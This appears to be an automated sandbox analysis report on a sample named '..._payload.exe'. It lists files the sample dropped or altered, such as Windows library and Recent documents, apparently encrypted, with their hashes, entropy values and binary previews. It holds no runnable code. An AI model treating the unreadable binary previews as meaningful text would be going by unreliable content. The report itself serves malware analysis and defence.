                                                                                                      SSDEEP:6:QI2rwg55pwDc0srVwTVoFwE10lknLOlwsdb8P2EaBq3SOXXvV9Wcii96Z:QqX6r0oKE10WLOSczuS8v6cii9a
                                                                                                      MD5:163FA870BC11EF87305B45D7985F3E93
                                                                                                      SHA1:8CCECE7C8278AD6C61A766FE2073F3591DE7FEED
                                                                                                      SHA-256:B940719917BF368A61FB2B88F0EF389BD4E30EDBB1C432135983050F68F7594D
                                                                                                      SHA-512:6C45277E551E6BA6F3757CB6C03AAAD71FD5D074D92A8C90D6FF62A6E8A523EA82903D4A2CA4AD0A1016EE92FD484DD05FCDD8D8C63F988C377885F78BA5EEBD
                                                                                                      Malicious:false
                                                                                                      Preview:..j.o.....9.....~.|.........~@.9Q..:z.z`o.Wma<it:..u/...U.p...<.{.qVj..u......7.p..P.......nU..s`..l..S..S.z &....p.. U..XYq...z..[.....&......6)....4.[.6.o(Vu.b..5.T..2)...g..>..r..C!T....n~.9nx{..y.Q....?.*.R...R@..N.).u~NMJ.._.a)....@. 2;.y..n.tK@...:..gu.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1352
                                                                                                      Entropy (8bit):7.841924922173719
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2xsl5vbsR+k5KV8+sy4tx0ymiehKH6FT1rPw5WfO5pOXEeTmdFxiWsy6th36r5vk:msl57xMJ7aFBDw5WDmdFxiWXWJ6twD
                                                                                                      MD5:D0D8DE27523AE2D3A4785E9EF19C39D2
                                                                                                      SHA1:5F5092965EDAA40824FAA3C45B9637416D20CC65
                                                                                                      SHA-256:9F745D0D4229C3E00655F1FCAD9396458B2FAC2681D38EEFDD0EACCEEEF70990
                                                                                                      SHA-512:9D66A42C52229B40B8758A7CB21E09C89311504B0103E26FD4850C3C593E851739BEE2F3CE7013CC32B712CEA604C93BC1D44920730813A2E4FC66890B424BA3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.Yq.e....=....u.]xG7R",..+'..[...._..N..u.>n..#....R.l.!ol.v.)..-v...\....l...(...^>B...RX/.|.[_.)..moc`..E.~.y..Sc..%...20.........q..gA4#.?.m...\.x......;..A.5.I.g.~..c..j......T.....9......|]\...d;%XATKQr.\A0.K..MF@...{.:.Q.[*.+~M3./.oH.f.Y.i.S...b.xKH:,..{.1.Mu....D..w...Vw..0.#g..-8H....e.......db.|bePVx'..U...N.$.=..'. .......W.."h...4.Y.'i....m...($\.@|.H."%[bt..cT.}.".%.c.(...,.U.2~.j.@.+.......c..W.E.n...n^D....$.0.+.......#.cJ.s....0t.mA.BU.s8..?.o.U.?I@..#.Y}.+%."...7CE*O...4..'.h......g..p..2.;5...Z.......:...^VuE?~.$0.......^`.|N..9.|X.=.B?.uS....{ .C.1...d.e_K..`...t.>R^..J...&=...\'..R......~...7...Y..{..F..,..iY..'......^....".8.ss..../.O./.....D..-..3...Z{.T._q...}...^[...B...EZ...x..J.`1x....e..'..Z......>..k...Dl.........p....[.M.v./..K..a@Q...s..h./.....L..b...i.U...c...J"~.....T..\;j.~.v..)..<.R0....l.S:uVku..X:..r....H..L5....Q.....T.)......E..m.9..}JU.01%rR...h..N....R....p..q...>M./.k.........t

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2424
                                                                                                      Entropy (8bit):7.923538209970081
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:hd4kMyvIAbymT9WZb/QZFRzF02RfVCR4kB38J03fczWwG6MDRNKFwD:f4kMyvIAN6SF70WfwCk6JwfcKwG/Gm
                                                                                                      MD5:E4CF5317E68A0060E314C17800500561
                                                                                                      SHA1:B419CCEB2807014DB6106244C9D01FDCEE05AE22
                                                                                                      SHA-256:DA90C824DF01DE8CBD3E14CDAA370E00931388CA37A879131542F020374BF0F5
                                                                                                      SHA-512:90B79A2ADBC656F745E506C8EAD946BCAEEC2DB993EA1F7197D78828B68D666B2790B2FE741DC15637C1A7E8FFBB89E84242F0580819C5E7B3E64D17AECA7E6D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlz..Y..V{....I......V.x.'-w..g...-./+.:Yn..|.(....|"..........Z...37$K..L'.............~J......Q. .~.....#GW[......3g..e.m$...7.L...)....ih;$.h.S.....9.....,k+."[...|-nfS_..YnEsi.Lb....w0s`...*..Sh.^...6......e..C).T.h:..V..........2....]...`..1..!....SrB..~.E...j.X.t.i....mk2..+..........7Q..Q...>I.....M.".......V...YC..o..{..T..dw.mO.I.......m.f*...s.{....p6.E.i..58..Ht.....D...+.!....F.`...ex....I.....&..0..W..,...k_N}!(.)6W.]c.._QF1.._%%8!.!'....7#..F...^+.g."...#.{...*w.>.%.....e...Z.u0qW?...3..G.S.....l.(.p.M...g....@jO%......!....&.b........u..Q.b.T.9..ZD..08x..".q.....1..$.h.s...pc.}}.0."B..Q..l<...d.Vs....{...VS......wM.0.^........T*.........YM......Z...V.V....tG.~.>.[q.E...3.\......L.fa^..S0F.............+V...G5B..b..P.0.........U+.9Y...N.....%.N..v._O...'..g.z/.'.6./..t.M.p......8.".s.;.%mo...n|2..........o..+Y.t.....39i4e......*...y-......J..7@.3..\O&.n...........9F..fH.....(Wi1V.....O<..^.r&oi.q......a..>E.D.x.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Music.library-ms

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2381
                                                                                                      Entropy (8bit):7.91044863240328
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:hW8bLDm0IlbQnpKb+k282KJfiuVzS2NGkq+U0dI+wUOVmaJFfHGSwD:s8bPm9l0e5F5/zrvdIR3tR6
                                                                                                      MD5:D59F9965C35F20D3E59AC22BA6A26DB2
                                                                                                      SHA1:085BB2CFFBFA363BBF7C83CFDF4666026E8FD9F9
                                                                                                      SHA-256:B691485982DA7D198D0797F056BF4F5BF2CB60BAE0C094ACF5DAC4557F1E84B4
                                                                                                      SHA-512:70B89233E0045E521E179151BC73A0AF8AAAE57DBEDF34B47D1FE13E402EA4EFDD08D03B07227F5E614562EA4C2055477B9179A184B9AA408D3C41ED6117CF0D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...i..|W..U."0$.URj.&.c.o#.I.....0....2Yv..3......!Q.*.p...B.5.`.R.C~..S......^.Z........6Re...r....a.N.....41.C&......Bz.Z.[|.T...........u..i&/.c......I......8..dh:N03...Q<-..d..t ~..d........7H.TeM1.&..Y...x8..%.......:..0...B.......1>..|d.........3......I3...a.H...2.e=.C..9...6).#..J...P%.l....%.[v.G.p.7/.Z...S._...?}...uRQ.3t...l.4...f..[!....<............t......Ex.c.f......`.Q.wS-K.d!...GEY...Y.eLD{...F....+z.+.w.HLf'.j..g...O...o_0...lcE.......Z..C......3zK.........6o..c%.#i..$...r=e..2.^.<o**.n`.l.h.?.UF_.O...}.O=.0...g..G...L~%......1....{v......1s*..aq...2.nF.qp.F....#m[..G....>.N.VYpn..../+zV.....U7.U.5k...{.P_..3g..TMr.?.$..Pb..mw8.w.b......].N..F).P.)X...0...i./z;....]..0..Lg..U.j...wS>z....0......_.V........|.u.`S.Py.4.....|..F......k..^..{eV.7#..9....c..#sIY...W.g.$Kt.:<.../.I,..C..7.B.Koy/.m....:.C-.*[6p..]..Yk.._.l...j..R.<..Op..F.{"Zx..x....R.ji..].&.......'.[.M.\...GGm`.@W.....=dS!..t".{P9.>..Z)#.R..b.[..K0....Gg.R<..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Pictures.library-ms

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2398
                                                                                                      Entropy (8bit):7.923246908293526
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:wN/oq/FfzMCs/NkELHgD3WWpGPEEeOgFIjDi20w9Iovxw3YBkil6nwD:whoASSKHG3WeGMEeFujDVyqjB1d
                                                                                                      MD5:B59CD1B17E54EDB01D26436A9947A5E7
                                                                                                      SHA1:011F3382A601C3E4C66FA40B7BFAF6A709587A28
                                                                                                      SHA-256:BAA69B30FC6A802CED696EB96390ED7AAEFE5372AA62B561F4A2ED83D075B064
                                                                                                      SHA-512:81F16FAAB496A3529CD0D522FA1C2B1A047687CDAE9110DC2A894FA4B46D3D0F57E317A665CCA902DA912F6EFDA648A9DBE2E2E259D109049068D63ED3FBF137
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlMl)A!.H.P..@.........I..4.....|.f^.-Y...o.fw.......:..~........mom4.H.I...H6..L...-..F..;E..w......hC l...S.9.?.1G-...".....b.'.K.m...g..N..Y.k=>v.$....7../x6Z.x,.UH.\...A.K.4..K.p-x...}......)5}j..3[5....#.@Q.1...=.#..."..JO\..NJwt..)lW.w2!k.{.#..!.j@....X.Z.l.......=.m.o*......j......X\..4.J....P.x..n@...2.I....$y..0....F .,h.....Y.U.J...&........~.hrqJg..._........Fs.#.z.....v....F.,."x....\..mW:K{..;Q.....}.Uq.lr$.P{X.)..2.....>oo.T...y......d..#..5..i1...$...$....*4Tk....W.#.W...H.#....5vk.`.x'>C4.c~^.L.G.|...1^8y.gY.Bc.`...|@:.d^8.3.../.9.um|.B.v..'..N.fv.&.I.........P{..nw3{..wo....r...[@......,.sL%.^..[hR......!...Tg....Z../.u&.y.(\.F^.....f.'6a..n..qy...c..O..d.. .%R...U......m..w.......{2.:..[.c.t.h...........:X...1..f..E.+_D......K..0.HG:.i.P..l.x.."..c...........0.&...YCv*......].....ONr>..BZ>;6..C..2..R.s.#..u:..9{.k%.l.x{./B.y..."vx....IpD...M!A8..?...bl..9.9.c..H..7.....d.!.9._.d5..f....L..T0....O......ah.g.|jF.

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\SavedPictures.library-ms

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1358
                                                                                                      Entropy (8bit):7.834177089632794
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Y0hcGE1yvov8Ns8oKqUQ4MpPNqXBrY3MfjekE1wdJ1hswXDwem1+JDu8W1gaftKc:nhcGE1mYxKqdUXBrKM7e/eJHswzwemkO
                                                                                                      MD5:B31189F2DC75C21AA9E01CE4D12CA949
                                                                                                      SHA1:C89A9D7B3552FBBBA29A29D2E282877060AC6420
                                                                                                      SHA-256:789E83F792466C576FC928B18CB8CF2424EE073E74218B04EE545CAAA1461386
                                                                                                      SHA-512:CB1E57A0A79C728D43048EB576A780EB3208D7F35DAA1FF74C1D49C919E3CED4693C11C9C30BA33EFBF3F0FCC303EC620352C6259EC2DB87E8EE2601181B0F4C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...z..s..r.<..E........vos..M.M..o'8[.JY....`...$.!7'H..Cb....c..A...K.y.&..{6.._.A..+..x...eC........,O3.X-..H"P4`..g...8*..btL...g.6..PRk.....s.U...JQ..).L...r.-.lT......H.....9.us..T...7...}.ee.~8BV.(m...K.....}...b..^#.Q.`..X(.q|...,Y..u.2.<.fT..Cw,...wh..7gQ%....s..M...{lY<w+..0.....^A.D...*....a.+...)..d..^..B...@.;y..._.SD..a....k~....v..~s;....eTf..6=.q..of.E/............aq.K..7.zy...=D?y.b....r.P...1..........l.-..7."....`x....<.F.,...[.C.=.A..[~.T!...xv.}...........7.Z...)H....skv.i...6....<d.......,..N..;u..ja........N.~.x.."Pv.,RJi.....I`.$.....:.)\nj...E.!vJ.c....V......D;.}.tA..E=.r.1...?.B......[....D.U.X<MoPY.3^.qX.l...7..v.4Xg...K......r0.*.Gy....>..q..!...(....@...446....4M.5.k...4V.N7...T..j).e..U.B6.7...Z.Ux....+.....1eT..9.7....`.......p.3w~...p0x..A[.;'?..YOi..]...,.Y...!...K.A...K.@&7.txr....%ZG...w..`AF5..Q@..1gYo.4.....}...2...]...J........8..o$-..D_.m......Mw..j...1.o...i.S;....H..'...Hw...:.Mh....W.....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Videos.library-ms

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2409
                                                                                                      Entropy (8bit):7.922814904802137
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:0wk3JBIpT61uUdZOajt67Y3JhK4RsNXH1hG2+2UaQitutBclfcqFjnwwJU5iGXwD:0wkgpTzqoajt67Y3MhumJuWJpU5tc
                                                                                                      MD5:4ACB8615F5EACEF0ABD6AA96AF0FC963
                                                                                                      SHA1:CE0BD0FE2280F5E394E81BDC5F7938FB416B352C
                                                                                                      SHA-256:966093375ABFBEC8CA88186714AC36002404E8BC9AE59AEFBF624B2BD8A31C6C
                                                                                                      SHA-512:934EC50350EF5E4FB9DC45C2512CF17C1E9D3CF12C63C7D54ECB795B94E8A47C65AD9A5410A518EC2BA0FE0E5CE0402C224BB263DCDB2ED51D213849C7971F52
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlCN.....hR..C...Ci..QR.>j/.....h.5...W])u....;.s...%./F.d...J...b.?)-p./v.*w.1.hU.S...gNf.#b.J............@.,......9Aa.]r..(p..........oi..M........fetW.8...e/.-Z.7~...bw.x...g. W...A._M...T...g...9...K.=....tX.....z.p.CZ.E.g....z..4.....w...Ay..J...z..7................6.<.o.'...c..lK..;yV..tola..4..B.E.....i`...._.".#.....,..Cq.$=...,1.}XI.f}.v.."..9....>m4<[.....).U.....[4..p[..$B=:Tt...j...q...D.....C].8.5..,....4..q........%e........7.j.+]..K1.z..S2 .....u&Y..)c....=..*v...Z...t...v'C.T."(:.T.s.W......$;Q.~...Vr.(N7...:...E..@.x.~.x..4......#... .J...|..zE..a...R..+.e.9.%D.....9...9.=..o.E..$$...:i`.... ..6......".0...2...J.y..N..P.......`.H..t..gh_Em.W.nU..lyFW.p.(..........%..(H..[t.......!..W...C.N.".._.j.....}R.D-}2X.^..... /b.#...6 K.Hl.\..H.8U8..@.z..X..6.......E. :...n..\]x.FC...Mn.m+.}.O...U-s..c........?CG_.......k......d.&.(%+.o...+'.....~VI..J.........d.L..!S......F...$6...E...c_?e......qAqb.#.sp......t!#...@?H/

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AIXACVYBSB.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.834266106667347
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:h8ySPwahdBuoRzcXLdSVJlMyi4fu5Zu+4bTviXQq/TgM4OeyQXvM5xupYog9eA2s:e/PJpbxtGt4Pw9sbOe9XvKGGwFwD
                                                                                                      MD5:1E91DB611E24ADEC87094BB1E7CED9C0
                                                                                                      SHA1:5CAB76FA6E2B1C85E7EEF5D126AC187F2CCF7178
                                                                                                      SHA-256:C8441A416BE813EDF4441B4B49CB0C9A787AE34B0C306C682A490FF63E8B0DFF
                                                                                                      SHA-512:E0D62540D2B51F3D89EBC18DC280CCD5F98853183EF6DEA025E185A86C51BA4EFF99A5DAB555E59C2FCF17214778C749F5923F1D012ECE441016BA27C57E436F
                                                                                                      Malicious:false
                                                                                                      Preview:AIXAC..Y7...Z....\.B..+...U..xQ.ym...........2.geh..LEC.@j.J].....g6.y...+.....K|z.xaW..yF.!>@.|.g..."Dx.iJ>k.$.P.;1).-./.._(uS'.....+....g..A.....3[s\.`(u.<`-...Hk...=6.D.i..J.B.^....o.hLO..../Q...<!..:.d.[..U..D...E...xF?l..UTk......*...tu(.0.?..r~...mU(.[..ul..P.;i....:_/=...d......i..).5...............z..".......[..OG.|...lP.Dm.nU.."yF..]T..Q).Aj.W.-..3..n..+.3..|7..V..H.".S0......z...?.....1....1...C2T..R!.F.9e..r....*.-w.d.e.v..D.....~..~.U&*.h$H.X..)...]W,....r..v.....;..Z.v.....)...u..}L.j.?.....G..M..J}..C.......#1RK,g..R.....g.......|W...EMy.2.n..:.'.d..fl+E;..N.5,...mY...F...r%.:3.A.DBk.[....#.Z[+....Q..WV.....7.....o.8c............h+.@.M..,.b{'.fgBT.`/....MVP..].l.`.-.j..,....Y.)+.9t..A...k..'80.A.A...P8..b.I...C..u/l...jT.G>.m...^....-....[..,.{#9.E....t#9q.0.tX.N.N....;.....`].."..zE82..H.>-.fl...9..naP..e.,..%..TD.y[.Au.g..W.G....M..W.U.<S.R.Yv......x.V]cJ...VC2K..a.....6'./.ie....Km.....)O.3"/.E}.........M.4.%.......^.r..

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AIXACVYBSB.xlsx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.857411951729365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:I6CE0rHK1JVG6oshFbpDxzvoob4gb8r81gD1AITRX7/CsRRuv6bD:IZE0rqk63Bxzygb8r81gFRX7J0wD
                                                                                                      MD5:9D94F0BEC9D69B72485CD4C1AF117FCA
                                                                                                      SHA1:2D2A7DCAC257A0344F4E7C230732080171966647
                                                                                                      SHA-256:A03495F4201F05B13AE5879906B10001E099EE1D478D0DCFD36DE29B28D212CF
                                                                                                      SHA-512:5E7A5C464190D1A46B8B85B547F11F1DD60389CC54B576DD7701922B54EF61701C4B3F05B525BB720662A315668B7944E7B8AF836458B7345288299D8FA52474
                                                                                                      Malicious:false
                                                                                                      Preview:AIXAC~......$.l.>@....RZ=jh.s.Bf=B........)..2..&..8......A....6....f...RL.tJp..1Q?.K.a...b..K. .&.....7iH..el.%.f....1!.O.........<.@$...f.......}.....O..8.e.$..........T.<"83..On1.q.*.-..1.!._...+..|}v.%9t.-z.....UX\..A.3.b...1<uz....w|R......gfcr...i.......Vzh.........YR...s...+.o.)W.p.H.........J.(/..q.j.J=..y.i.kyI....(....=....P .|.).@r...E.\=......l..+......I^H+G.'uhk.~...4..`_.K........F...^a.F..q....GX..V.u.~.f.......68mtL=/..J......U ....!M.=.X.\....=U:xi...~.t.fi......M...C.[.5n'......*o...oN....y.u8~>.tu*...s...i.U.....u..-..?.X_.j~...r0.....;g....F..bH.q...->.@...\.N.$B.gg.@..m..<.C7Q..8,.R.X.r..\.on+...n}..9.W...u|J.....S.3..J..}...h.8U..|-zk^....'=.e.....9...;...D...;..@..}.G.G....E..Nx..[...P....Ih..,..*..?I;...?G.N.`..~.Y..0...!Z...;.h....5.....}.}.w..X.P.......th.@.. )..4..A5mD.......N.-..)..k\.9.v..]...b.?R.iGV.....NR....G.&....{.%("..R..d....v...w..uQ.7)NK&;...@z.:.....%=...z.........xJ.J.o"....=.vi[.E.C}.......

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BWDRWEEARI.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.8621865706180385
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:9EXJue/y1/5KPMdYgQh4r0EjfiyAWf3eNz0g1CDJceYamuXRu8aZYvYLNS10Sjqs:9E5Ny1Ukqdhy0EbXAWmUDpGUvYRSqwD
                                                                                                      MD5:2A62B31FEE3AE4CFFF5517B81E1B8BA0
                                                                                                      SHA1:25E30C0D25AD8B1A64BFCCD3A3FAE85BBF23495E
                                                                                                      SHA-256:D047475DCA450BE6CBD2677D02AA1F7FD8E3771354DC4ADC719CD6A9D829C91C
                                                                                                      SHA-512:81C11CE331714083501E020503032286BD9B4AA8F87D8778DC0D2422393B51208B1D71419C71EDDACBFA24BD9815607B13F3075944CD5AA1AB35708725B85CF6
                                                                                                      Malicious:false
                                                                                                      Preview:BWDRWA.c...>.#..U....A@p.d.^t.e....L.f1.Y...-u.*.....D..T.k.."...v.rT.I...8..-.s....h.......v.I... ...[.'d.l..Kp5+=..........M.v.N.xo.Wc./.''F.jN..c.....<.i.?o....C...j.....X."-V.".^..P.%..... .Z.,I..T.n.;...#O<..G.....d.y.A. G.}...|......K..f....r........y.6VH...ev..y....X..d...]..v.....Q.Q."...n..E}....C..#......0..H.......9...{.!4...........C.".<?I.[....i.'O`.....f\.2<...m..._..k.....i.~I.{...5...q..a'.M*n..."5....0ly_......Z.x0e.n..B.F.......+.AzZ.H..5tud}.....l...>..pY.i..;yg6./...b[.@.....>]f.!.b.T....^....Q.aLHJ..b(n.....?\. ..I..W..H.!.).K.......ow-*.|....B..1#.}..8.2.+...'b..8!jL...L.u..'..2..{... M......]..o..0.z...IIF+..*.V..2.x.M..c...........P..Kf..g(...$R..Z.2J.c.Zp..l.H...2...Q.TW.N.7G.....[}........oz...W.?*.Y....ca..>.+.^&....a...ML........_.....Z.tf.*........_^.WK....1=.h.7r.......U.,....v'.E.rfG....J..U...........j....[....+..F.....g.F..bK.>.6l{.x....iJ..p.m[l5..:...).k.^.......5..!.UQ...C.&*.+.l.h.%.o'=*y..ts.<=...x...

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DTBZGIOOSO.docx

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.831523968480816
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+F4s5Cm/g/yjNT8WLlXRueRvU82uDP+ha3+beVSPncpnrWMIah6TnB/8QIrzv6bD:e9CmY/lWNc3uDP8aObknrWz8wD
                                                                                                      MD5:BF4DC4AE25440E62A05E4A31B89F1CF0
                                                                                                      SHA1:2F2B0E589348043427C77028BB0D471A6A56BE5A
                                                                                                      SHA-256:02743449FD889D91FAC23C6A8AF0C4C792CB05ABA309E82D59D6197DB02D6280
                                                                                                      SHA-512:A0C2418CE1DB67D0378381989372A71314F1F9FCDC4CB0867F98B604FBAF2008107D35C74D915477DC7A69E301B7002976961443ED8E7D8A8F0EADA8982FCD64
                                                                                                      Malicious:false
                                                                                                      Preview:DTBZG....B..."..I/X......*a.y.=. ...b...Y...ye.].......M9.|Y1ZjQ..C.Ka?.....D.....Q...I.O<X|.`.?...........Z.._.rT..-.M.s.V....F{|.>.......>.I.2...........)Y..P...0m.>#........,.G.(..]d.u..Ba5w..uO.S.....6.qK9.gF.!dg....w.3?../!.<B...s...}..u....[Q...0x.e...'..(...OO....#...).'...!fKE..'P3..'B\~."..x..=.i...AX.....n.K.M^R.1..TQ%,.Vp.".T../p. .KH..3..]....G.......HY..Q...y...s[.7.......)..=..D...."e..-..$E.D...{D..&[.n]0..c..)2.K....k..... .o..!?...(...8..p.G..y...-.CO.(......\.?..U.hbJ.............-S5..L*t......&......T..9{.5.\.0.8..i...uE..LG..].H.?O4.<.Q..V..K........MA..G.."..[.....'r.....8.1..C.M......7!.0@..M..C..(.u....V.~.`.....p........*...)..9U.[....Vm.._....p<..x[...M..S...At.C...|...(.e[..u....|.....c...5...J.A.iK/..r.. .........y..A.U.....s......Ym......3.....G...I~.p.>6...v^j.[$.< ..|..`..x5.0.g""R.l%w7..t.U....;.....t..!d.M....Y....../y3?..>.f?giGK...........,<.vE.|.]....W.1$...X.g......._\.... ....C.9P.....?.W...m....

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DTBZGIOOSO.pdf

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.854271818693247
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:bm46t0SdVSIA+EPbNUgPbDPwK7q94TuINKc7XaxFbiYOyVmgHCMzwaiLv6bD:2t0S37A/PdbZg34bX8/5VHCMzwamwD
                                                                                                      MD5:E797D3506A6DA41C9D4FBE4440F65997
                                                                                                      SHA1:572BEA225CE488784A547C683335B2AE1F450978
                                                                                                      SHA-256:70449ECBB58034D8B7EF4D639AA53A360D3465172EA0A40F9938D034CEC6BB0C
                                                                                                      SHA-512:B882999102D5E81B7E2E32B47CC8154D6E5D5F4FE93EA55C86D33A8E816EBE1E72AA266885CBAFA5B3F9BE1ADD4B090E4C88D0A5BFC2448BB70AEA6616C2A303
                                                                                                      Malicious:false
                                                                                                      Preview:DTBZGv:i.^...F...............Ry.bz.-ul.y.^...a......n)H.z.T..C......%8Q*..s..B)...\s..j]......"._.....~..Lb"......S>...v..M.9..].._SH.)."..ms..u.B..A.....EV..6.j.+.....&. gC.3.C.,......A....9..xg...G.....>...'......s..^.Z.0^...v,.fh/3.......\8...p.....C...;B........E.}OY.6.Z..t3.s6`=.u3...}......g..(...B....6.?@.>T.3..+.ru.q.$........"*>..I.c...%./.J..a(n.M...R.u.Zw?X_'.y.L=..r.&R..k..........7zgf..'..d..?.f..'.J[...:l./...z....@......NBKi2`^@....&..L+.TC.E.q....W.....R.1Gx...I`U........."...w...,..o.=.'.." .....s..W...&[.r*~..O,......E.r.....'.C.....&..g........9.x......9|.K.D.o...".R.j.*......Y..#.}.#ELZ........v3...3........q..<y.~1.a...".*e..lC..].C.p.O..g...+i.p..9..nRzn[L9...=n..3..;.8cR.3..%*Z....*..(..*f.n...7..Q...?.;p....UI.$.>z.}..+..3...g.[....6.oRs....K0.._.V...S..T..V......SM@/?.....4.Q.X.C.....v....OW!.'...v.o[M7E...:..v...B(*-B....B*.....R.~.lR.o...2......,.......SDt....Qb.[...\....z[.X...\S... .....E9d..J.hVS

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\DVWHKMNFNN.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1360
                                                                                                      Entropy (8bit):7.8625775918544
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3B/RKyORSpH10L8QFm0baDSmDPjvIpk47XTq/WR8OtokL+gyaLv6bD:3BEyOkpaLzTbaXrq7LTSi8cZLwD
                                                                                                      MD5:5799C43FA85A8D154F188BE042D0B3B3
                                                                                                      SHA1:98364B1B1C1BDFAE2A89436102E02EAD58DA6235
                                                                                                      SHA-256:908DD95A5706364D5FA0705C302B1823EB0CD97763E92B0DC774F5F6D9B21CE6
                                                                                                      SHA-512:AC5F8285BD07B9C9AD1F1512DC81F6C07A075B64A752691DEC79F55EDF9A3CD8DA94D396010DA21ED7BC6FECE6FF0A179735D2519F60EB3ADAEA4A26D056BECC
                                                                                                      Malicious:false
